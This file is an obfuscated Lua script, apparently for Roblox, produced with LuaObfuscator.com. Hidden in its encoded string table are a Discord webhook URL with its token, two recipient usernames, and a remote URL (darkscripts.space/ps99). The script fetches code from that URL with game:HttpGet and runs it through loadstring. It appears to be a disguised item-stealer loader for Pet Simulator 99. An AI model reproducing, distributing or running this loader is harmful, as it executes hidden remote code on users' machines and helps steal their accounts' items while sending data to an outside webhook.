--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=v5(v81,v19);v19=nil;return v87;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=927 -(214 + 713) ;local v83;while true do if (v82==(0 -(117 -(32 + 85)))) then v83=(v31/((5 -3)^(v32-(1 -0))))%((1 + 1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%(932 -((2127 -(226 + 1044)) + 74))) ;end end else local v84=(1639 -(1523 + 114))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 -0)) or (568 -(367 + (875 -674))) ;end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(958 -(892 + 65))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 -(0 -0) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * (188 + 68)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;return (v41 * (12338840 + 4438376)) + (v40 * (260471 -194935)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -(458 -(416 + 26)) ) * ((2 + (0 -0))^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,14 + 17 );local v47=((v20(v43,19 + 13 )==((1 -0) -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v46==((438 -(145 + 293)) -0)) then if (v45==(0 + 0)) then return v47 * 0 ;else v46=1 -0 ;v44=(430 -(44 + 386)) + 0 ;end elseif (v46==2047) then return ((v45==0) and (v47 * ((792 -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v48) local v49=1486 -(998 + (1732 -1244)) ;local v50;local v51;while true do if (v49==(862 -(814 + 45))) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=1 + 0 ;end if (v49==(774 -(201 + 571))) then v51={};for v88=1139 -(116 + 1022) , #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=3;end if (v49==(4 -3)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -(12 -7) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if (v66==(0 -0)) then local v90=(function() return 0;end)();while true do if (v90==(0 -0)) then if (v52==(1785 -(599 + 1185))) then local v102=(function() return 0 + 0 ;end)();while true do if (v102==0) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v102=(function() return 1;end)();end if (v102~=(1 + 0)) then else v58=(function() return v23();end)();v52=(function() return 2;end)();break;end end end if (v52==(574 -(507 + 67))) then local v103=(function() return 0;end)();while true do if (v103~=(1750 -(1013 + 736))) then else v55=(function() return {};end)();v52=(function() return 1;end)();break;end if (v103~=(0 + 0)) then else v53=(function() return function(v131,v132,v133) local v134=(function() return 0;end)();while true do if (v134==(0 -0)) then local v165=(function() return 0;end)();local v166=(function() return;end)();while true do if (v165==0) then v166=(function() return 0 -0 ;end)();while true do if (v166==(867 -(550 + 317))) then local v180=(function() return 0 -0 ;end)();while true do if (v180==(0 -0)) then v131[v132-#"," ]=(function() return v133();end)();return v131,v132,v133;end end end end break;end end end end end;end)();v54=(function() return {};end)();v103=(function() return 2 -1 ;end)();end end end v90=(function() return 286 -(134 + 151) ;end)();end if (v90~=(1666 -(970 + 695))) then else v66=(function() return 1 -0 ;end)();break;end end end if (v66==(1991 -(582 + 1408))) then if (v52~=(10 -7)) then else for v99= #"~",v23() do local v100=(function() return v21();end)();if (v20(v100, #".", #"~")==0) then local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104==(3 -0)) then if (v20(v106, #"xnx", #"nil")== #"}") then v107[ #"?id="]=(function() return v59[v107[ #".com"]];end)();end v54[v99]=(function() return v107;end)();break;end if (v104==(0 -0)) then v105=(function() return v20(v100,1826 -(1195 + 629) , #"asd");end)();v106=(function() return v20(v100, #"xnxx",7 -1 );end)();v104=(function() return 1;end)();end if (v104==(243 -(187 + 54))) then if (v20(v106, #"}", #",")~= #"\\") then else v107[782 -(162 + 618) ]=(function() return v59[v107[2 + 0 ]];end)();end if (v20(v106,2 + 0 ,3 -1 )== #"{") then v107[ #"19("]=(function() return v59[v107[ #"xxx"]];end)();end v104=(function() return 3;end)();end if (v104~=(1 -0)) then else local v109=(function() return 0 + 0 ;end)();while true do if (0==v109) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==0) then local v167=(function() return 1636 -(1373 + 263) ;end)();local v168=(function() return;end)();while true do if (v167==(1000 -(451 + 549))) then v168=(function() return 0 + 0 ;end)();while true do if (v168==(0 -0)) then v107[ #"xxx"]=(function() return v22();end)();v107[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"{") then v107[ #"xxx"]=(function() return v23();end)();elseif (v105==2) then v107[ #"xnx"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v105~= #"-19") then else local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==0) then v184=(function() return 1384 -(746 + 638) ;end)();while true do if (0==v184) then v107[ #"19("]=(function() return v23() -((1 + 1)^(23 -7)) ;end)();v107[ #"0836"]=(function() return v22();end)();break;end end break;end end end v109=(function() return 1;end)();end if (v109==(342 -(218 + 123))) then v104=(function() return 2;end)();break;end end end end end end for v101= #"|",v23() do v55,v101,v28=(function() return v53(v55,v101,v28);end)();end return v57;end if (v52~=(1583 -(1535 + 46))) then else local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if (v97~=(0 + 0)) then else v98=(function() return 0;end)();while true do if (v98~=(0 + 0)) then else v59=(function() return {};end)();for v111= #"!",v58 do local v112=(function() return 560 -(306 + 254) ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==1) then v115=(function() return nil;end)();while true do if (0~=v113) then else v114=(function() return v21();end)();v115=(function() return nil;end)();v113=(function() return 1 + 0 ;end)();end if (v113==(1 -0)) then if (v114== #",") then v115=(function() return v21()~=(1467 -(899 + 568)) ;end)();elseif (v114==(2 + 0)) then v115=(function() return v24();end)();elseif (v114== #"asd") then v115=(function() return v25();end)();end v59[v111]=(function() return v115;end)();break;end end break;end if (v112~=(0 -0)) then else v113=(function() return 0;end)();v114=(function() return nil;end)();v112=(function() return 604 -(268 + 335) ;end)();end end end v98=(function() return 291 -(60 + 230) ;end)();end if (v98==1) then v57[ #"-19"]=(function() return v21();end)();v52=(function() return 575 -(426 + 146) ;end)();break;end end break;end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[1 + (0 -0) ];local v64=v60[1458 -(282 + 1174) ];local v65=v60[814 -(569 + 242) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=1024 -(706 + 318) ;while true do if ((v86==(1252 -(721 + 530))) or (502>1529)) then if (v80<=(1280 -(945 + 326))) then if (v80<=(9 -5)) then if (v80<=(1 + 0)) then if ((518<902) and (v80==0)) then v77[v79[2]]();else do return;end end elseif ((2994>858) and (v80<=((1079 -(142 + 235)) -((1229 -958) + 429)))) then v77[v79[1 + 1 ]]=v79[980 -(553 + 424) ];elseif (v80==(3 + 0)) then local v140=v79[2];local v141=v77[v79[1503 -((2662 -1254) + 92) ]];v77[v140 + (1087 -(407 + 54 + 625)) ]=v141;v77[v140]=v141[v79[1292 -(993 + 295) ]];else v71=v79[1 + 2 ];end elseif (v80<=(1177 -(415 + 3 + 753))) then if (v80==(2 + 3)) then v77[v79[2]]=v62[v79[1 + 2 ]];else v71=v79[1 + 2 + 0 ];end elseif (v80<=(2 + 5)) then v77[v79[(226 + 305) -(406 + 71 + 52) ]]();elseif (v80==(1777 -(1749 + 20))) then local v146=0 + 0 ;local v147;local v148;local v149;local v150;while true do if (v146==(1324 -(1249 + 73))) then for v175=v147,v72 do local v176=0;while true do if ((v176==(0 + 0)) or (3755<=915)) then v150=v150 + (1146 -((1010 -544) + 679)) ;v77[v175]=v148[v150];break;end end end break;end if (v146==((0 -0) -0)) then v147=v79[5 -3 ];v148,v149=v70(v77[v147](v13(v77,v147 + (1901 -(106 + 1794)) ,v79[1 + 2 ])));v146=1 + 0 ;end if ((3946>3743) and (v146==(2 -1))) then v72=(v149 + v147) -(2 -1) ;v150=0;v146=116 -(4 + 110) ;end end else v62[v79[587 -(57 + 527) ]]=v77[v79[1429 -(41 + 1386) ]];end elseif ((v80<=(117 -(17 + 86))) or (1335>=3306)) then if ((4844>2253) and (v80<=((17 -9) + 1 + 2))) then if (v80>(22 -(57 -45))) then if ((452==452) and (v77[v79[5 -(756 -(239 + 514)) ]]==v79[170 -(122 + 16 + 28) ])) then v71=v71 + (1 -0) ;else v71=v79[9 -6 ];end else local v121=v79[2 + 0 ];local v122,v123=v70(v77[v121](v13(v77,v121 + 1 ,v79[1 + 2 ])));v72=(v123 + v121) -1 ;local v124=0;for v138=v121,v72 do local v139=0 -(1329 -(797 + 532)) ;while true do if ((v139==0) or (4557<2087)) then v124=v124 + 1 ;v77[v138]=v122[v124];break;end end end end elseif (v80<=(77 -(30 + 35))) then v62[v79[3 + 0 ]]=v77[v79[(915 + 344) -(1043 + 214) ]];elseif (v80==(48 -(12 + 23))) then if (v77[v79[(2854 -1640) -(323 + 889) ]]==v79[10 -(1208 -(373 + 829)) ]) then v71=v71 + (581 -(361 + 219)) ;else v71=v79[323 -(53 + 267) ];end else v77[v79[(732 -(476 + 255)) + 1 ]]=v62[v79[416 -(15 + 398) ]];end elseif (v80<=(998 -(18 + 964))) then if (v80>(56 -41)) then v77[v79[2 + 0 ]]=v79[(1132 -(369 + 761)) + 1 ];else local v129=850 -(20 + 830) ;local v130;while true do if ((0 + 0 + 0)==v129) then v130=v79[128 -(116 + 10) ];v77[v130]=v77[v130](v13(v77,v130 + (1 -0) + 0 ,v72));break;end end end elseif ((3874==3874) and (v80<=(755 -(542 + 196)))) then do return;end elseif (v80>(38 -20)) then local v156=v79[1 + 1 ];v77[v156]=v77[v156](v13(v77,v156 + 1 + (0 -0) ,v72));else local v158=v79[1 + 1 ];local v159=v77[v79[7 -4 ]];v77[v158 + ((240 -(64 + 174)) -1) ]=v159;v77[v158]=v159[v79[1555 -(1126 + 425) ]];end v71=v71 + (406 -(118 + 41 + 246)) ;break;end if (v86==(0 -0)) then v79=v67[v71];v80=v79[1];v86=1122 -(118 + 1003) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q00028Q00026Q00F03F03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313239383339323833353639383938323931322F586C35644E45676D4A6C6D747378676174306B4C42663536447877664E7A74305848577078773953385154712D357749506A5F6C4F5051425F444A30495146414F2D6D49030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031E3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F70732Q3903083Q00557365726E616D65030B3Q0044726B6F6E746F702Q363503093Q00557365726E616D6532030B3Q0066726564616C656369656E00163Q0012103Q00013Q00260B3Q000D00010002002Q043Q000D0001001210000100043Q001209000100033Q001205000100053Q001205000200063Q002003000200020007001210000400084Q0008000200044Q001300013Q00024Q000100010001002Q043Q0015000100260B3Q000100010001002Q043Q000100010012100001000A3Q001209000100093Q0012100001000C3Q0012090001000B3Q0012103Q00023Q002Q043Q000100012Q00013Q00017Q00",v9(),...);
